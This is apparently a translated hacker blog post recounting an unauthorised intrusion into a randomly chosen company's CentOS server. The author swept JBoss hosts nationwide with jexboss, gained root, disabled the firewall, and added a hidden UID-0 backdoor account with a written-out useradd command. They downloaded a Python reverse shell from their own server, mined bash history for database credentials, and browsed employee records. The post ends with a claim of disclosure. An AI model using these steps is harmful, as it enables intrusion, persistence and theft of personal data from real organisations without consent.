Yesterday, I integrated the jexboss script into my multi-threaded framework, swept the jboss across the country, and found more than a thousand shells.
The tool address is: https://github.com/Xyntax/POC-T
Randomly took a seemingly big manufacturer for this intrusion test
Discover the portal
Get the shell through jexboss and see that it is a centos machine (IP has been coded).
It appears to be root, make sure.
unstable portal
problem with shell
When the command is executed next, it is found that the shell that comes with jexboss is very unstable. Various problems occur, including but not limited to the following two serious problems:
- When executing interactive commands, the program will crash and exit. For example, the cat command will be echoed normally, but the vi command will cause the shell to report an error and exit directly.
- When the command is wrong, no echo
I had to make a stable shell myself
nc's attempt
See that the system has nc. I want to simply use nc to play a stable shell and come back, and found that all the nc commands I submitted are not echoed, and I can't connect to the shell.
Py's attempt
Abandoned nc to see if the system has python, the result is still --versionnot echoed, but there is-h
Then I want to use py to play a shell and come back. I used this code and found that it didn't work. It's a bit weird.
I did another simple print, still no echo!
why?
Here I thought about it, if it is because of an error, there will be no echo. Then the error that can cause the error should be that the special characters in the code ( ) ' "are wrong in the transmission process.
I tested it with a few simple shell codes and confirmed the guess:
- Commands containing ' " | > >> &special characters such as , cannot be executed. and no echo
this means?
This means that I basically can't execute commands with non-alphabetic characters through this shell!
Can't use nc, can't use python, pipes, redirection can't work
SSH attempt
It seems that the shell is basically useless. I looked at the process, port, and iptablesfirewall, and found some targeted configurations, indicating that some security defenses are still deployed. After seeing port 22, I decisively turned off the firewall. I create a new user, and then use ssh outside to connect OK?
So I created a new admin user
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash php
Check it out /etc/passwd, there is no problem, the creation is successful!
then when changing its password
passwd php
No echo! ! !
As I recall, this action of changing the password requires the user to interact several times. As I said before, the commands that execute the interaction all report an error and exit, and no echo is displayed. . So it's over again
Generally, ssh will not allow empty password connections. I tried it, and the result is like this.
ssh: connect to host 183.xxx.xxx.xxx port 22: Connection refused
I checked the ssh configuration file and the cat /etc/ssh/sshd_config
results are as follows:
# $OpenBSD: sshd_config,v 1.97 2015/08/06 14:53:21 deraadt Exp $
# This is the sshd server system-wide configuration file. See
# sshd_config(5) for more information.
# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin
# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented. Uncommented options override the
# default value.
Port 2525
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::
In addition to prohibiting login with empty password in the configuration file, the administrator also changed the default port of ssh to 2525.
So I added a sentence to the configuration file to allow an empty password to log in, wouldn't it be OK?
However, when I write commands, I cannot use non-alphabetic characters! No editor interaction yet!
vi collapses directly, sed does not work, and echo redirection does not work. . .
stable portal
According to the shyness of this spicy chicken shell, it seems that it is difficult for me to write things into the system, so it is always possible to download the code from the outside and execute it locally. Anyway, there is Python.
wget xxx.xxx.xxxThis command has no special characters! should be able to execute
I wrote a script to hang on my server, and then wget from the target machine to the local.
When ls came out, I was blown away!
Decisive python shell.py, when you see that sh-4.1one coming out, you know it's done!
Then I changed the password of my established user, the external ssh connection, and the portal finally stabilized.
browse the database
Get a stable shell and look at the database
Try looking for related commands in the command history:
cat ~/.bash_history |grep sql
The result is as follows, it is in stock
Effortlessly into the database:
The command line in mysql is already familiar to me
use information_schema
select table_name,table_rows from tables where TABLE_SCHEMA = 'cloudcompany' order by table_rows desc;
Administrator table:
All are employee data (216 pieces of data), let's look at one:
Pick some useful ones to look at:
Another table (30W data):
Epilogue
It seems that there is not much in the database. The efficiency of writing articles while doing it is too low. It has been working for nearly four hours. If you don't do anything on the intranet, you will leave the loophole!
Note: This article has blocked all sensitive data and is only for technical exchange. The intrusion event has been submitted to the Wuyun Vulnerability Platform.
Please indicate the source when reprinting, and inform me by
mail: [email protected]